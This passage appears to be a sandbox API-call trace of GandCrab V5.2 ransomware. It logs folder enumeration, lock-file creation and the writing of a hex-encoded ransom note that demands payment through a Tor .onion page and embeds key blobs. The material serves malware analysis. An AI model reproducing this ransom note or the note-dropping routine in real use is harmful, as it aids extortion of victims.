7\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.022] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0095.023] CloseHandle (hObject=0x230) returned 1 [0095.037] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.038] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.038] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x161)) [0095.038] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.038] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.038] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.038] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\d2ca4a09d2ca4deb61a.lock") returned 56 [0095.038] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\printhood\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0095.040] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.040] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.041] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\") returned 32 [0095.041] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\*" [0095.041] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0095.041] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0095.041] CloseHandle (hObject=0x230) returned 1 [0095.045] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0095.045] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0095.045] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0095.045] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Recent" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Recent") returned="C:\\Users\\CIiHmnxMn6Ps\\Recent" [0095.045] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Recent\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Recent\\" [0095.045] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.046] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.046] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.046] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.046] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.046] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.046] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.046] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.046] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Recent\\\\TITWMVJL-DECRYPT.txt") returned 50 [0095.047] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Recent\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\recent\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0095.055] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x